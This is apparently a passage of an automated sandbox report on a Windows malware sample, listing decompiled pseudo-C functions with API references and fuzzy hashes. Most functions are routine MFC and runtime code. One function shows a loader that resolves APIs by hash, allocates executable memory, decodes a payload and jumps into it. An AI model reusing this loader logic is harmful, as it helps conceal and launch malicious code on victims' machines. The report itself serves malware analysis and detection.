                  Similarity
                  • API ID: LongWindow
                  • String ID:
                  • API String ID: 1378638983-0
                  • Opcode ID: 5db1cf8e091e2c8a437a7c27e64b2570dcc467992d3ac8b88cd9058fe1aa6147
                  • Instruction ID: 810bde46e47805890040c907d9e550c609abfaacfc61c2af389d08159f719c5e
                  • Opcode Fuzzy Hash: 5db1cf8e091e2c8a437a7c27e64b2570dcc467992d3ac8b88cd9058fe1aa6147
                  • Instruction Fuzzy Hash: 2AE086332101146BC7106BAADC04C4BBFADEFEA3317050537F655D3161CA75D8118B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040451B(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				void* _t7;
                  				void* _t11;
                  				void* _t13;
                  				void* _t14;
                  				void* _t15;
                  
                  				_t15 = __ecx;
                  				_t7 = E0040ACDF(_t11, __ecx, _t13, _t14, __ecx, __eflags, _a4, _a8, _a12, _a16); // executed
                  				if(_t7 != 0) {
                  					 *((intOrPtr*)(_t15 + 0x5c)) = GetMenu( *(__ecx + 0x20));
                  					return 1;
                  				}
                  				return _t7;
                  			}











                  APIs
                    • Part of subcall function 0040ACDF: __EH_prolog3.LIBCMT ref: 0040ACE6
                  • GetMenu.USER32(?), ref: 0040453B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  • Opcode ID: 66df6734f36cd05d173709c3a8e51ce962251809194cf71b69e651ed303963b6
                  • Instruction ID: e77aef2fb446fdbe468449979d8eaaa0d22de51c12c1053e944ad6392ff2d827
                  • Opcode Fuzzy Hash: 66df6734f36cd05d173709c3a8e51ce962251809194cf71b69e651ed303963b6
                  • Instruction Fuzzy Hash: 2CE0EC36400258BFDB119F62DC048AB7FAAFF45365B05443AB95992160E772D830EB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0043ABB6(intOrPtr _a4) {
                  				void* _t6;
                  
                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                  				 *0x466eac = _t6;
                  				if(_t6 != 0) {
                  					 *0x468784 = 1;
                  					return 1;
                  				} else {
                  					return _t6;
                  				}
                  			}





                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0043ABCB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 397268e2361d87a014e1d1895c26ec71cdc79384a3b682af9213abaf7b095825
                  • Instruction ID: adcfc2ec59f8131cad79dbeede6f75f469dde3a6a742d11a41e180f43ac4c6ee
                  • Opcode Fuzzy Hash: 397268e2361d87a014e1d1895c26ec71cdc79384a3b682af9213abaf7b095825
                  • Instruction Fuzzy Hash: A5D0A7766903485EEB105F71BC08B233BDCD384795F144436FA0CC6190F6F5D550EA09
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00430AD2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t9;
                  				void* _t18;
                  
                  				_push(0xc);
                  				_push(0x45de98);
                  				E00431818(__ebx, __edi, __esi);
                  				E004339CB();
                  				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
                  				_t9 = E004309E7(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
                  				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
                  				 *(_t18 - 4) = 0xfffffffe;
                  				E00430B08();
                  				return E0043185D( *((intOrPtr*)(_t18 - 0x1c)));
                  			}






                  APIs
                    • Part of subcall function 004339CB: __lock.LIBCMT ref: 004339CD
                  • __onexit_nolock.LIBCMT ref: 00430AEA
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 004309F6
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 00430A06
                    • Part of subcall function 004309E7: __msize.LIBCMT ref: 00430A24
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A48
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A5E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A70
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A7E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A89
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                  • String ID:
                  • API String ID: 1316407801-0
                  • Opcode ID: a216f9923c9975a0f317412ad0bce5b59f46745d06f6589707a2665974790f42
                  • Instruction ID: 6d8d4708de4b9a91417e96c5bd7686bfa658171a6882dda3d32428defeeee52c
                  • Opcode Fuzzy Hash: a216f9923c9975a0f317412ad0bce5b59f46745d06f6589707a2665974790f42
                  • Instruction Fuzzy Hash: 27D017B1841204EADB10BBAACC0378DBA60AF49319F60921EB021660E2CB7C1A018B0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00412C34(void* __ecx, int _a4) {
                  				int _t7;
                  
                  				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                  					goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x50)))) + 0xa0)));
                  				}
                  				_t7 = ShowWindow( *(__ecx + 0x20), _a4); // executed
                  				return _t7;
                  			}





                  APIs
                  • ShowWindow.USER32(?,?,?,004050C1,00000001), ref: 00412C45
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: c4bc1a37b7502a52d234633a370e0309815108f442178a029fe1d30a7837fec8
                  • Instruction ID: b808e145f8c4c1f72aae7c75721f5196043c7ac8eaefe8ca5c15e3459cb75938
                  • Opcode Fuzzy Hash: c4bc1a37b7502a52d234633a370e0309815108f442178a029fe1d30a7837fec8
                  • Instruction Fuzzy Hash: 33D05E36100648DFC7048B00D508BB537A5FB54315F5000A9E5080E532C7339862CB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E004085AB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                  				char _v8;
                  				intOrPtr _v20;
                  				intOrPtr _t8;
                  				void* _t9;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  
                  				_t21 = __esi;
                  				_t20 = __edi;
                  				_t18 = __ecx;
                  				_t17 = __ebx;
                  				_t8 =  *((intOrPtr*)(__ecx + 0xd4));
                  				if(_t8 != 1) {
                  					__eflags = _t8 - 2;
                  					if(__eflags == 0) {
                  						_push( *((intOrPtr*)(__ecx + 0xd8)));
                  						goto L8;
                  					} else {
                  						_push(__ecx);
                  						_v8 = 0x462598;
                  						E00430CF4( &_v8, 0x45b30c);
                  						asm("int3");
                  						_push(4);
                  						E00431A9B(E0044AC81, __ebx, __edi, __esi);
                  						_t19 = E00420529(0x104);
                  						_v20 = _t19;
                  						_t15 = 0;
                  						_v8 = 0;
                  						if(_t19 != 0) {
                  							_t15 = E0041EC43(_t19);
                  						}
                  						return E00431B73(_t15);
                  					}
                  				} else {
                  					_push(GetMenu( *(__ecx + 0x20)));
                  					L8:
                  					_t9 = E0041F4E8(_t17, _t18, _t20, _t21, __eflags); // executed
                  					return _t9;
                  				}
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu
                  • String ID:
                  • API String ID: 3711407533-0
                  • Opcode ID: 7a8d6883986902a76e0a4b941a5239b94e62478ace76e4674834ef28fa068524
                  • Instruction ID: 212a02c67525b04f8061536d9f402557b92849d6adee2e2fba0ca1320a023372
                  • Opcode Fuzzy Hash: 7a8d6883986902a76e0a4b941a5239b94e62478ace76e4674834ef28fa068524
                  • Instruction Fuzzy Hash: 36D0C970510101BFCA315B448E499563666BB25304FA5447BE14BB80A2CA3B8CA3AB29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004044B6(void* __ecx, int _a4, int _a8, long _a12) {
                  				long _t6;
                  
                  				_t6 = DefFrameProcA( *(__ecx + 0x20),  *(__ecx + 0xe8), _a4, _a8, _a12); // executed
                  				return _t6;
                  			}




                  0x004044cd
                  0x004044d4

                  APIs
                  • DefFrameProcA.USER32(?,?,?,?,?), ref: 004044CD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FrameProc
                  • String ID:
                  • API String ID: 3341528880-0
                  • Opcode ID: a1ac97ca6e6fa3ef207845b2f73191d6b332b135f83fdb9d2792b99261401ce9
                  • Instruction ID: 761935b3b5861f7f41f0d66eba6b8c0e881f5c6a5c97450171930e68cced642d
                  • Opcode Fuzzy Hash: a1ac97ca6e6fa3ef207845b2f73191d6b332b135f83fdb9d2792b99261401ce9
                  • Instruction Fuzzy Hash: 81D0EA77000148FBCF025F82DC08D9A7F2AFB99365F558569FA1D090328B339572EB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404644(void* __ecx, int _a4, int _a8, long _a12) {
                  				long _t5;
                  
                  				_t5 = DefMDIChildProcA( *(__ecx + 0x20), _a4, _a8, _a12); // executed
                  				return _t5;
                  			}




                  0x00404655
                  0x0040465c

                  APIs
                  • DefMDIChildProcA.USER32(?,?,?,?), ref: 00404655
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ChildProc
                  • String ID:
                  • API String ID: 2769581038-0
                  • Opcode ID: f4bc7cf18c1a03e49df77973594172dd1ce020d0782857df20642151823b36cd
                  • Instruction ID: 77bd7395ef173343b399dfab2321bc704dceaae62940af897972e085eed1b4c0
                  • Opcode Fuzzy Hash: f4bc7cf18c1a03e49df77973594172dd1ce020d0782857df20642151823b36cd
                  • Instruction Fuzzy Hash: 32C00237000148FB8F025F82DC04C9A7F2AFBA9361B558015FA180943187339531EB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00435EE6() {
                  				void* _t1;
                  
                  				_t1 = E00435E74(0); // executed
                  				return _t1;
                  			}




                  0x00435ee8
                  0x00435eee

                  APIs
                  • __encode_pointer.LIBCMT ref: 00435EE8
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E86
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000006,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E9D
                    • Part of subcall function 00435E74: RtlEncodePointer.NTDLL(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435EDB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction ID: 17cc3f827ce23fb23929f520a180e9886f633758a1a1239f613e605e914001a9
                  • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E004037C0(intOrPtr __edx, void* __eflags) {
                  				intOrPtr _v36;
                  				struct HINSTANCE__* _v40;
                  				short _v56;
                  				char _v60;
                  				char _v64;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr* _t18;
                  				intOrPtr* _t20;
                  				intOrPtr* _t22;
                  				intOrPtr* _t24;
                  				void* _t26;
                  				long _t27;
                  				void* _t30;
                  				intOrPtr _t31;
                  				void* _t32;
                  				void* _t34;
                  				void* _t35;
                  				void* _t38;
                  				void* _t46;
                  				intOrPtr _t51;
                  				void* _t55;
                  				void* _t56;
                  				void* _t59;
                  				long _t60;
                  				void* _t63;
                  				void* _t73;
                  				void* _t76;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				_t51 = __edx;
                  				E00403340(E00403130(0x4674a0, 0x44f0f5), _t80, 0xa);
                  				E00402F80(_t14);
                  				_t18 = E00403690(E004035A0(_t51, 0), 0x3e006b7a);
                  				_t20 = E00403690(E004035A0(_t51, 0), 0x92ffa82f);
                  				_t22 = E00403690(E004035A0(_t51, 0), 0xc319fa22);
                  				_t24 = E00403690(E004035A0(_t51, 0), 0x49b3b7c3);
                  				_t59 =  *_t18(0, 0x29a, 0xa);
                  				_t26 =  *_t20(0, _t59);
                  				_t27 =  *_t22(0, _t59);
                  				_t60 = _t27;
                  				_t46 =  *_t24(_t26);
                  				_t30 = E00402EF0( &_v64, 0x2b0, 0);
                  				_t73 = _t63 + 0x44;
                  				if( *((intOrPtr*)(_t30 + 0x18)) < 8) {
                  					_t31 = _t30 + 4;
                  					__eflags = _t31;
                  				} else {
                  					_t31 =  *((intOrPtr*)(_t30 + 4));
                  				}
                  				_push(_t31);
                  				_t32 = E00430D56();
                  				_t34 = E00403690(E004035A0(_t51, 0), _t32);
                  				_t76 = _t73 + 0x10;
                  				_t55 = _t34;
                  				_t82 = _v36 - 8;
                  				if(_v36 >= 8) {
                  					E00404490(_t46, _t55, _t60, _t82, _v56);
                  					_t76 = _t76 + 4;
                  				}
                  				_v36 = 7;
                  				_v40 = 0;
                  				_v56 = 0;
                  				_t35 = VirtualAlloc(0, _t60, 0x1000, 0x40); // executed
                  				_t56 = _t35;
                  				E004311E0(_t46, _t56, _t60, _t56, _t46, _t60);
                  				_t38 = E00402EF0( &_v60, 0x18d, 0);
                  				if( *((intOrPtr*)(_t38 + 0x18)) < 8) {
                  					_t39 = _t38 + 4;
                  					__eflags = _t38 + 4;
                  				} else {
                  					_t39 =  *((intOrPtr*)(_t38 + 4));
                  				}
                  				E00403700(_t39, _t56, _t60);
                  				_t84 = _v36 - 8;
                  				if(_v36 >= 8) {
                  					E00404490(_t46, _t56, _t60, _t84, _v56);
                  				}
                  				 *_t56();
                  				return 0;
                  			}

                  APIs
                    • Part of subcall function 004035A0: __wcslwr.LIBCMT ref: 0040362D
                    • Part of subcall function 00402EF0: LoadStringW.USER32(?,00000000,?,00000000), ref: 00402F0C
                  • VirtualAlloc.KERNELBASE ref: 004038EB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocLoadStringVirtual__wcslwr
                  • String ID:
                  • API String ID: 3774548895-0
                  • Opcode ID: 1592d7604d7e71ef99574a7cbd0b9e400da60f1e698cbef6546b2b55b08ba799
                  • Instruction ID: 7289857ab61adf7b4a353bb28ab849fa169669fa0404094dea338f5cccf6774d
                  • Opcode Fuzzy Hash: 1592d7604d7e71ef99574a7cbd0b9e400da60f1e698cbef6546b2b55b08ba799
                  • Instruction Fuzzy Hash: FF3151E2E4430076E5107A726C4BF1B299C9B9576EF05043AF905BB2D2F9BDDA0442AB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 100%
                  			E00440CFD(signed int __eax, void* __esi) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v20;
                  				signed int _t142;
                  				signed int _t145;
                  				signed int _t148;
                  				signed int _t151;
                  				signed int _t154;
                  				signed int _t157;
                  				signed int _t159;
                  				signed int _t162;
                  				signed int _t165;
                  				signed int _t168;
                  				signed int _t171;
                  				signed int _t174;
                  				signed int _t177;
                  				signed int _t180;
                  				signed int _t183;
                  				signed int _t186;
                  				signed int _t189;
                  				signed int _t192;
                  				signed int _t195;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int _t204;
                  				signed int _t207;
                  				signed int _t210;
                  				signed int _t213;
                  				signed int _t216;
                  				signed int _t219;
                  				signed int _t222;
                  				signed int _t225;
                  				signed int _t228;
                  				signed int _t231;
                  				signed int _t234;
                  				signed int _t237;
                  				signed int _t240;
                  				signed int _t243;
                  				signed int _t246;
                  				signed int _t249;
                  				signed int _t252;
                  				signed int _t255;
                  				signed int _t258;
                  				signed int _t261;
                  				signed int _t264;
                  				signed int _t267;
                  				signed int _t270;
                  				signed int _t276;
                  
                  				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                  				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                  				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                  				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                  				if(__esi != 0) {
                  					_v16 = _v16 & 0x00000000;
                  					_v20 = __eax;
                  					_t142 = E0043C0B5(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                  					_t145 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                  					_t148 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                  					_t151 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                  					_t154 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                  					_t157 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                  					_t159 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x37, __esi);
                  					_t162 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                  					_t165 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                  					_t168 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                  					_t171 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                  					_t174 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                  					_t177 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                  					_t180 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                  					_t183 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                  					_t186 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                  					_t189 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                  					_t192 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                  					_t195 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                  					_t198 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                  					_t201 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                  					_t204 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                  					_t207 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                  					_t210 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                  					_t213 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                  					_t216 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                  					_t219 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                  					_t222 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                  					_t225 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                  					_t228 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                  					_t231 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                  					_t234 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                  					_t237 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                  					_t240 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                  					_t243 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                  					_t246 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                  					_t249 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                  					_t252 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                  					_t255 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                  					_t258 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                  					_t261 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                  					_t264 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                  					_t267 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                  					_t276 = _v12;
                  					_t270 = E0043C0B5(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                  					 *(__esi + 0xac) = _t276;
                  					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                  				} else {
                  					return __eax | 0xffffffff;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction ID: 59fd04f248aebe5f6f2e84f9c40bf99b053675ffa63a6a04f46dc497c744b53e
                  • Opcode Fuzzy Hash: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction Fuzzy Hash: 95E1D0B290024DFEEF12DAE1CD81DFF77BDEB08748F04055BB255E2041EA75AA059B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0042EEC9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t114;
                  				signed int _t116;
                  				signed int _t118;
                  				intOrPtr _t122;
                  				long _t131;
                  				signed int _t138;
                  				signed int _t139;
                  				void* _t143;
                  				signed int _t147;
                  				signed int _t148;
                  				void* _t156;
                  				intOrPtr* _t163;
                  				signed int _t175;
                  				signed int _t176;
                  				signed int _t179;
                  				void* _t181;
                  				signed short _t190;
                  				intOrPtr _t192;
                  				void* _t200;
                  				void* _t204;
                  				void* _t205;
                  				void* _t207;
                  
                  				_t165 = __ecx;
                  				_push(0x7c);
                  				_t109 = E00431A9B(E0044CA27, __ebx, __edi, __esi);
                  				_t200 = __ecx;
                  				 *(_t204 - 0x10) = __ecx;
                  				_t163 =  *((intOrPtr*)(_t204 + 8));
                  				_t190 =  *(_t163 + 4);
                  				 *(_t204 - 0x1c) = _t190;
                  				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
                  					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
                  						L49:
                  						_t190 =  *(_t204 - 0x1c);
                  						goto L50;
                  					} else {
                  						_t109 = GetKeyState(4);
                  						_t217 = _t109;
                  						if(_t109 < 0) {
                  							goto L49;
                  						} else {
                  							_t114 = E0041F396(_t163, _t165, GetKeyState, _t200, _t217);
                  							_push( *_t163);
                  							_t192 = _t114;
                  							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
                  							while(1) {
                  								_t109 = E0040EE3C(_t163, _t165);
                  								if(_t109 == 0) {
                  									break;
                  								}
                  								__eflags =  *(_t109 + 0x3c) & 0x00000401;
                  								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                  									break;
                  								} else {
                  									_push(GetParent( *(_t109 + 0x20)));
                  									continue;
                  								}
                  							}
                  							if(_t109 == _t200) {
                  								_t164 =  *(_t192 + 0x3c);
                  								 *(_t204 - 0x14) = E0040F142(_t200);
                  								__eflags = _t164;
                  								if(__eflags == 0) {
                  									L19:
                  									_t116 = E00404461(__eflags, 0x70);
